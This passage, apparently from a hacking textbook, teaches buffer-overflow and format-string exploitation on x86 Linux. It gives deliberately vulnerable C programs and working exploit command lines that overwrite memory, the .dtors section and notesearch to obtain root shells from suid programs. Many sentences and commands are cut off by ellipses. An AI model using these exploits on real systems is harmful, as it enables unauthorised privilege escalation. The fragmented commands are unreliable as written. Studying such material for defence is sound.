3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 15
Sorry, you didn't win
...

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 40 credits] ->

[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 140 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
Thanks for playing! Bye
...

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n"
...
"\x70\x8d\x04\x08\n"
...
"y\n"x10
...
/game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 1
Sorry, you didn't win
...

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 130 credits] ->
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 230 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 330 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 430 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 530 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 630 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 730 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 830 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 930 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1030 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1130 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1230 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 1230 credits] ->
Change user name
Enter your new name: Your name has been changed
...

reader@hacking:~/booksrc $

As you might have already noticed, this program also runs suid root
...
As
with the stack-based overflow, shellcode can be stashed in an environment
variable
...
Notice the dash argument following the
exploit buffer in the cat command
...
Even though
the root shell doesn’t display its prompt, it is still accessible and still escalates
privileges
...
/shellcode
...
/getenvaddr SHELLCODE
...
"A"x100
...
"1\n"' > exploit_buffer
reader@hacking:~/booksrc $ cat exploit_buffer - |
...
Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account
...

You now have 60 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits

7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
Change user name
Enter your new name: Your name has been changed
...
Like buffer overflow exploits, format string exploits also
depend on programming mistakes that may not appear to have an obvious
impact on security
...

Although format string vulnerabilities aren’t very common anymore, the
following techniques can also be used in other situations
...
They have
been used extensively with functions like printf() in previous programs
...
Each format parameter expects an additional
variable to be passed, so if there are three format parameters in a format
string, there should be three more arguments to the function (in addition
to the format string argument)
...

Parameter    Input Type    Output Type
%d           Value         Decimal
%u           Value         Unsigned decimal
%x           Value         Hexadecimal
%s           Pointer       String
%n           Pointer       Number of bytes written so far

The previous chapter demonstrated the use of the more common
format parameters, but neglected the less common %n format parameter
...
c code demonstrates its use
...
c
#include ...
h>
int main() {
int A = 5, B = 7, count_one, count_two;
// Example of a %n format string
printf("The number of bytes written up to this point X%n is being stored in
count_one, and the number of bytes up to here X%n is being stored in
count_two
...

B is %x
...

The following is the output of the program’s compilation and execution
...
c
reader@hacking:~/booksrc $
...
out
The number of bytes written up to this point X is being stored in count_one, and the number of
bytes up to here X is being stored in count_two
...
B is 7
...
When a format
function encounters a %n format parameter, it writes the number of bytes that
have been written by the function to the address in the corresponding function argument
...
The values are then outputted, revealing that 46 bytes
are found before the first %n and 113 before the second
...

B is %x
...
First the value of B, then the
address of A, then the value of A, and finally the address of the format string
...

[Figure: the stack frame for the format function call, drawn from the top of the stack to the bottom of the stack; one of the labeled entries is the value of B.]

The format function iterates through the format string one character at a time
...
If a format parameter is encountered, the appropriate action is taken, using the
argument in the stack corresponding to that parameter
...

printf("A is %d and is at %08x
...
\n", A, &A);

This can be done in an editor or with a little bit of sed magic
...
c > fmt_uncommon2
...
c fmt_uncommon2
...
B is %x
...
B is %x
...
c
reader@hacking:~/booksrc $
...
out
The number of bytes written up to this point X is being stored in count_one, and the number of
bytes up to here X is being stored in count_two
...
B is b7fd6ff4
...
What the hell is b7fd6ff4? It turns out that since
there wasn’t a value pushed to the stack, the format function just pulled data
from where the third argument should have been (by adding to the current
frame pointer)
...

This is an interesting detail that should be remembered
...
Luckily, there is a
fairly common programming mistake that allows for the latter
...
Functionally, this works fine
...
Examples of both methods are
shown in fmt_vuln
...

fmt_vuln
...
h>
#include ...
h>
int main(int argc, char *argv[]) {
char text[1024];
static int test_val = -72;
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way to print user-controlled input:\n");
printf("%s", text);

printf("\nThe wrong way to print user-controlled input:\n");
printf(text);
printf("\n");
// Debug output
printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,
test_val);
exit(0);
}

The following output shows the compilation and execution of fmt_vuln
...

reader@hacking:~/booksrc $ gcc -o fmt_vuln fmt_vuln
...
/fmt_vuln
reader@hacking:~/booksrc $ sudo chmod u+s
...
/fmt_vuln testing
The right way to print user-controlled input:
testing

The wrong way to print user-controlled input:
testing
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

Both methods seem to work with the string testing
...
But as we saw earlier, if the appropriate
function argument isn’t there, adding to the frame pointer will reference a
piece of memory in a preceding stack frame
...
/fmt_vuln testing%x
The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbffff3e0
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

When the %x format parameter was used, the hexadecimal representation of a four-byte word in the stack was printed
...

reader@hacking:~/booksrc $
...
"x40')
The right way to print user-controlled input:
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...

%08x
...

The wrong way to print user-controlled input:
bffff320
...
00000000
...
3830252e
...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
252e7838
...
78383025
...

[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

This is what the lower stack memory looks like
...
The bytes
0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot
...

reader@hacking:~/booksrc $

As you can see, they’re the memory for the format string itself
...
This fact can be
used to control arguments to the format function
...

0x353 Reading from Arbitrary Memory Addresses
The %s format parameter can be used to read from arbitrary memory addresses
...
/fmt_vuln AAAA%08x
...
%08x
...
%08x
...
%08x
The wrong way to print user-controlled input:
AAAAbffff3d0
...
00000000
...
If the fourth
format parameter is %s instead of %x, the format function will attempt to print
the string located at 0x41414141
...
But if a valid memory address
is used, this process could be used to read a string found at that memory
address
...
/getenvaddr PATH
...
/fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x
...
%08x
...
%08x
...
%s
The wrong way to print user-controlled input:
????bffff3d0
...
00000000
...
Since the program name fmt_vuln is two bytes less than
getenvaddr, four is added to the address, and the bytes are reversed due to the
byte ordering
...
Since this address is the address of the PATH environment variable,
it is printed as if a pointer to the environment variable were passed to printf()
...
These format parameters are only needed
to step through memory
...

0x354 Writing to Arbitrary Memory Addresses
If the %s format parameter can be used to read an arbitrary memory address,
you should be able to use the same technique with %n to write to an arbitrary
memory address
...

The test_val variable has been printing its address and value in the
debug statement of the vulnerable fmt_vuln
...
The test variable is located at 0x08049794, so by using a similar
technique, you should be able to write to the variable
...
/fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x
...
%08x
...
%08x
...
%s
The wrong way to print user-controlled input:
????bffff3d0
...
00000000
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%08x
...
%08x
...
%08x
...
%n
The wrong way to print user-controlled input:
??bffff3d0
...
00000000
...
The resulting value in the test variable depends on the
number of bytes written before the %n
...

reader@hacking:~/booksrc $
...
"\x94\x97\x04\x08")%x%x%x%n
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%100x%n
The right way to print user-controlled input:
??%x%x%100x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 120 0x00000078
reader@hacking:~/booksrc $
...
"\x94\x97\x04\x08")%x%x%180x%n
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%400x%n
The right way to print user-controlled input:
??%x%x%400x%n

The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 420 0x000001a4
reader@hacking:~/booksrc $

By manipulating the field-width option of one of the format parameters
before the %n, a certain number of blank spaces can be inserted, resulting in
the output having some blank lines
...
This
approach will work for small numbers, but it won’t work for larger ones, like
memory addresses
...
(Remember
that the least significant byte is actually located in the first byte of the four-byte word of memory
...

If four writes are done at sequential memory addresses, the least significant
byte can be written to each byte of a four-byte word, as shown here:
Memory                         94 95 96 97
First write to 0x08049794      AA 00 00 00
Second write to 0x08049795        BB 00 00 00
Third write to 0x08049796            CC 00 00 00
Fourth write to 0x08049797              DD 00 00 00
Result                         AA BB CC DD

As an example, let’s try to write the address 0xDDCCBBAA into the test
variable
...
Four separate writes to the memory addresses
0x08049794, 0x08049795, 0x08049796, and 0x08049797 should accomplish this
...

The first write should be easy
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??%x%x%8x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 28 0x0000001c
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xaa - 28 + 8
$1 = 150
(gdb) quit
reader@hacking:~/booksrc $
...
This is essentially reading a random DWORD from the stack, which
could output anywhere from 1 to 8 characters
...

Now for the next write
...
This argument could be anything; it just has to be four bytes long
and must be located after the first arbitrary memory address of 0x08049794
...
The word JUNK is four bytes long and will work fine
...
This
means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one
...
This is
getting tricky
...
The goal is to have four writes
...
The first
%x format parameter can use the four bytes found before the format string
itself, but the remaining three will need to be supplied data
...

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $


The addresses and junk data at the beginning of the format string changed
the value of the necessary field width option for the %x format parameter
...
Another
way this could have been done is to subtract 24 from the previous field width
value of 150, since 6 new 4-byte words have been added to the front of the
format string
...

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $
...
A hexadecimal calculator quickly shows that 17 more bytes need to be written
before the next %n format parameter
...

This process can be repeated for the third and fourth writes
...
/fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0
4b4e554a
4b4e554a
4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa
reader@hacking:~/booksrc $

By controlling the least significant byte and performing four writes, an
entire address can be written to any memory address
...
This can be quickly explored by statically declaring another
initialized variable called next_val, right after test_val, and also displaying
this value in the debug output
...


Here, next_val is initialized with the value 0x11111111, so the effect of the
write operations on it will be apparent
...
c > fmt_vuln2
...
c fmt_vuln2
...
c
reader@hacking:~/booksrc $
...
However, next_val is shown to be adjacent to it
...

Last time, a very convenient address of 0xddccbbaa was used
...
But what if an address like 0x0806abcd is used? With this address,
the first byte of 0xCD is easy to write using the %n format parameter by outputting 205 total bytes with a field width of 161
...
It’s easy to
increment the byte counter for the %n format parameter, but it’s impossible
to subtract from it
...
/fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x080497f4 = 52 0x00000034
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"
$1 = 161
reader@hacking:~/booksrc $
...
This technique can be used to wrap around
again and set the least significant byte to 0x06 for the third write
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0
4b4e554a
[*] test_val @ 0x080497f4 = 109517 0x0001abcd
[*] next_val @ 0x080497f8 = 286331136 0x11111100
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"
$1 = -165
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"
$1 = 91
reader@hacking:~/booksrc $
...
The wraparound technique seems to be working fine, but
a slight problem manifests itself as the final byte is attempted
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a4b4e554a
[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd
[*] next_val @ 0x080497f8 = 285212674 0x11000002
reader@hacking:~/booksrc $

What happened here? The difference between 0x06 and 0x08 is only two,
but eight bytes are output, resulting in the byte 0x0e being written by the %n
format parameter, instead
...
This problem can be alleviated by simply wrapping around
again; however, it’s good to know the limitations of the field width option
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a
4b4e554a
[*] test_val @ 0x080497f4 = 134654925 0x0806abcd
[*] next_val @ 0x080497f8 = 285212675 0x11000003
reader@hacking:~/booksrc $

Just like before, the appropriate addresses and junk data are put in the
beginning of the format string, and the least significant byte is controlled for
four write operations to overwrite all four bytes of the variable test_val
...
Also, any additions less than eight may need to be
wrapped around in a similar fashion
...
In the
previous exploits, each of the format parameter arguments had to be
stepped through sequentially
...
In addition, the sequential nature required three
4-byte words of junk to properly write a full address to an arbitrary memory
location
...
For example, %n$d would
access the nth parameter and display it as a decimal number
...
The second
format parameter accesses the fourth parameter and uses a field width option
of 05
...
This method of
direct access eliminates the need to step through memory until the beginning
of the format string is located, since this memory can be accessed directly
...

reader@hacking:~/booksrc $
...
/fmt_vuln AAAA%4\$x
The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

In this example, the beginning of the format string is located at the
fourth parameter argument
...
Since this is being done on the command line and the
dollar sign is a special character, it must be escaped with a backslash
...
The actual format string can be seen when it is printed
correctly
...

Since memory can be accessed directly, there’s no need for four-byte spacers
of junk data to increment the byte output count
...
For practice, let’s use direct parameter access to write a more realistic-looking address of 0xbffffd72 into the
variable test_val
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
Direct parameter
access is only used for the %n parameters, since it really doesn’t matter what
values are used for the %x spacers
...

0x356 Using Short Writes
Another technique that can simplify format string exploits is using short
writes
...
A more complete description of possible
format parameters can be found in the printf manual page
...

The length modifier
Here, integer conversion stands for d, i, o, u, x, or X conversion
...

This can be used with format string exploits to write two-byte shorts
...
Naturally, direct parameter access can still be used
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff0015
reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8
reader@hacking:~/booksrc $

Using short writes, an entire four-byte value can be overwritten with just
two %hn parameters
...


reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $
...
Using short
writes, the order of the writes doesn’t matter, so the first write can be 0xfd72
and the second 0xbfff, if the two passed addresses are swapped in position
...

(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $
...
One option is to overwrite
the return address in the most recent stack frame, as was done with the
stack-based overflows
...
The nature of stack-based
overflows only allows the overwrite of the return address, but format strings
provide the ability to overwrite any memory address, which creates other
possibilities
...
dtors
In binary programs compiled with the GNU C compiler, special table sections
called
...
ctors are made for destructors and constructors, respectively
...
The destructor functions and the
...

A function can be declared as a destructor function by defining the
destructor attribute, as seen in dtors_sample
...

dtors_sample
...
h>
#include ...
\n");
printf("and then when main() exits, the destructor is called
...
\n");
}

In the preceding code sample, the cleanup() function is defined with the
destructor attribute, so the function is automatically called when the main()
function exits, as shown next
...
c
reader@hacking:~/booksrc $
...

and then when main() exits, the destructor is called
...

reader@hacking:~/booksrc $

This behavior of automatically executing a function on exit is controlled by
the
...
This section is an array of 32-bit addresses
terminated by a NULL address
...
Between these two are the
addresses of all the functions that have been declared with the destructor
attribute
...


reader@hacking:~/booksrc $ nm
...
get_pc_thunk
...
0
080496b0 A _edata
080496b4 A _end
080484b0 T _fini
080484e0 R _fp_hw
0804827c T _init
080482f0 T _start
08048314 t call_gmon_start
080483e8 t cleanup
080496b0 b completed
...
0
08048380 t frame_dummy
080483b4 T main
080496ac d p
...
0
reader@hacking:~/booksrc $

The nm command shows that the cleanup() function is located at 0x080483e8
(shown in bold above)
...
dtors section starts at 0x080495ac
with __DTOR_LIST__ and ends at 0x080495b4 with __DTOR_END__
...

The objdump command shows the actual contents of the
...
The first
value of 80495ac is simply showing the address where the
...
Then the actual bytes are shown, as opposed to DWORDs, which means
the bytes are reversed
...

reader@hacking:~/booksrc $ objdump -s -j
...
/dtors_sample

...
dtors:
80495ac ffffffff e8830408 00000000
reader@hacking:~/booksrc $

...
dtors section is that it is writable
...
dtors section isn’t
labeled READONLY
...
/dtors_sample

...
interp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15


file format elf32-i386

Size
00000013
CONTENTS,

...
ABI-tag 00000020
CONTENTS,

...
dynsym
00000060
CONTENTS,

...
gnu
...
gnu
...
rel
...
rel
...
init
00000017
CONTENTS,

...
text
000001c0
CONTENTS,

...
rodata
000000bf
CONTENTS,

...
ctors
00000008
CONTENTS,

VMA
LMA
File off
08048114 08048114 00000114
ALLOC, LOAD, READONLY, DATA
08048128 08048128 00000128
ALLOC, LOAD, READONLY, DATA
08048148 08048148 00000148
ALLOC, LOAD, READONLY, DATA
08048174 08048174 00000174
ALLOC, LOAD, READONLY, DATA
080481d4 080481d4 000001d4
ALLOC, LOAD, READONLY, DATA
08048226 08048226 00000226
ALLOC, LOAD, READONLY, DATA
08048234 08048234 00000234
ALLOC, LOAD, READONLY, DATA
08048254 08048254 00000254
ALLOC, LOAD, READONLY, DATA
0804825c 0804825c 0000025c
ALLOC, LOAD, READONLY, DATA
0804827c 0804827c 0000027c
ALLOC, LOAD, READONLY, CODE
08048294 08048294 00000294
ALLOC, LOAD, READONLY, CODE
080482f0 080482f0 000002f0
ALLOC, LOAD, READONLY, CODE
080484b0 080484b0 000004b0
ALLOC, LOAD, READONLY, CODE
080484e0 080484e0 000004e0
ALLOC, LOAD, READONLY, DATA
080485a0 080485a0 000005a0
ALLOC, LOAD, READONLY, DATA
080495a4 080495a4 000005a4
ALLOC, LOAD, DATA

Algn
2**0
2**2
2**2
2**2
2**0
2**1
2**2
2**2
2**2
2**2
2**2
2**4
2**2
2**5
2**2
2**2

16
...
jcr
00000004 080495b8 080495b8 000005b8 2**2
CONTENTS, ALLOC, LOAD, DATA
18
...
got
00000004 08049684 08049684 00000684 2**2
CONTENTS, ALLOC, LOAD, DATA
20
...
plt
0000001c 08049688 08049688 00000688 2**2
CONTENTS, ALLOC, LOAD, DATA
21
...
bss
00000004 080496b0 080496b0 000006b0 2**2
ALLOC
23
...
debug_aranges 00000058 00000000 00000000 000007e0 2**3
CONTENTS, READONLY, DEBUGGING
25
...
debug_info
000001ad 00000000 00000000 0000085d 2**0
CONTENTS, READONLY, DEBUGGING
27
...
debug_line
0000013d 00000000 00000000 00000a70 2**0
CONTENTS, READONLY, DEBUGGING
29
...
debug_ranges 00000048 00000000 00000000 00000c68 2**3
CONTENTS, READONLY, DEBUGGING
reader@hacking:~/booksrc $

Another interesting detail about the
...
This means that the
vulnerable format string program, fmt_vuln
...
dtors section
containing nothing
...

reader@hacking:~/booksrc $ nm
...
dtors
...
/fmt_vuln:

file format elf32-i386

Contents of section
...

As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__
is only four bytes this time, which means there are no addresses between them
...


Since the
...
This will be the address of
__DTOR_LIST__ plus four, which is 0x08049694 (which also happens to be the
address of __DTOR_END__ in this case)
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode
...
/getenvaddr SHELLCODE
...
Since the program name lengths of the helper program
getenvaddr
...
c program differ by two bytes, the
shellcode will be located at 0xbffff9ec when fmt_vuln
...
This
address simply has to be written into the
...
In the output below the
short write method is used
...
/fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $
...
2# whoami
root
sh-3
...
dtors section isn’t properly terminated with a NULL
address of 0x00000000, the shellcode address is still considered to be a destructor
function
...


0x358 Another notesearch Vulnerability
In addition to the buffer overflow vulnerability, the notesearch program
from Chapter 2 also suffers from a format string vulnerability
...

int print_notes(int fd, int uid, char *searchstring) {
   int note_length;
   char byte=0, note_buffer[100];

   note_length = find_user_note(fd, uid);
   if(note_length == -1)  // If end of file reached,
      return 0;           //   return 0
...

   note_buffer[note_length] = 0;  // Terminate the string
...

   return 1;
}

This function reads the note_buffer from the file and prints the contents
of the note without supplying its own format string
...
In the following output,
the notetaker program is used to create notes to probe memory in the notesearch program
...

reader@hacking:~/booksrc $
...
"x10')
[DEBUG] buffer
@ 0x804a008: 'AAAA%x
...
%x
...
%x
...
%x
...
%x
...
'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch AAAA
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
AAAAbffff750
...
20435455
...
0
...
1
...
252e7825
...

-------[ end of note data ]-------
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
dtors section with the address of injected shellcode
...
bin)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9e8
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9e8 - 0xbfff
$2 = 14825
(gdb) quit
reader@hacking:~/booksrc $ nm
...
/notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\x08")%49143x%8\$hn%14825x%9\$hn
[DEBUG] buffer
@ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch 49143x
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999

21
-------[ end of note data ]-------
sh-3
...
2#

0x359 Overwriting the Global Offset Table
Since a program could use a function in a shared library many times, it’s
useful to have a table to reference all the functions
...


This section consists of many jump instructions, each one corresponding to
the address of a function
...

An object dump disassembling the PLT section in the vulnerable format
string program (fmt_vuln
...
plt
...
/fmt_vuln:

file format elf32-i386

Disassembly of section
...

                                        pushl  0x804976c
                                        jmp    *0x8049770
                                        add    %al,(%eax)

080482c8 <__gmon_start__@plt>:
 80482c8:       ff 25 74 97 04 08       jmp    *0x8049774
 80482ce:       68 00 00 00 00          push   $0x0
